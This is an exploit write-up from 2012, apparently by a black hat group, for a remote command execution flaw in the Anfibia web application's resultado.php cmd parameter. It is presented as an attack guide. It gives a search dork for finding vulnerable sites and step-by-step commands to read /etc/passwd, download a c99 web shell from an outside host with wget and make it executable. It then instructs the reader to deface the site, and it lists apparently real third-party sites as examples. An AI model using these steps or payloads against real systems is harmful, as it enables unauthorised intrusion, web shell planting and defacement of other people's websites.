# Exploit Title: Anfibia Remote Command Execution (RCE) Vulnerability # Date: 2012-02-03 [GMT +7] # Author: BHG Security Center # Discovered : Nitrojen90 # Software Link: http://www.anfibia.com.br/ # Dork: intext:"/op1.txt" "command" filetype:php # Tested on: ubuntu 11.04 # CVE : - ----------------------------------------------------------------------------------------- Anfibia Remote Command Execution (RCE) Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-02-03 Location : Iran-Tehran Web : http://Black-Hg.Org Critical Lvl : High Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- At First Search The Dork In Google.com. Find The WebSite And Paste The Bug URL in front of the address. Bug URL : enquete/resultado.php?cmd=[code] Vulnerability Page Is Open And Write THe Command For Attack . for upload shell at firt write the all code in down . 1-Write [PWD] For See The Directory Adress. 2-write [uname -a] For Get Info as Local. 3-write [ls -la] For See File And Dir In Public_html . 4-write [cd /etc;cat passwd] For See All USers In Sserver(SVR) . 5-write [cd /home/siteuser/public_html/dirname has 775prem; wget http://www.tektao.com.cn/files/c99.txt mv c99.txt c99.php] For Upload SHell TO Site . 6-write [chmod c99.php 0755] For Change Prem SHell Code FOr Run . 7-Deface Site ANd Submit. Example : P0c : http://localhost/enquete/resultado.php?cmd=[code] [url]www.corintisadqqmao.com.br/enquete/resultado.php?cmd=pwd[/url] [url]www.asewwsistirtvonline.cc/enquete/resultado.php?cmd=pwd[/url] --------------------------------------------------------------------------- @Special Thanks to : Net.Edit0r | A.Cr0x | 3H34N | 4m!n | ArYaIeIrAn | G3n3Rall | NoL1m1t | Mr.XHat | Bl4ck.Viper My Good Frineds : Hellboy - Cyrus(fr0nk) - md.r00t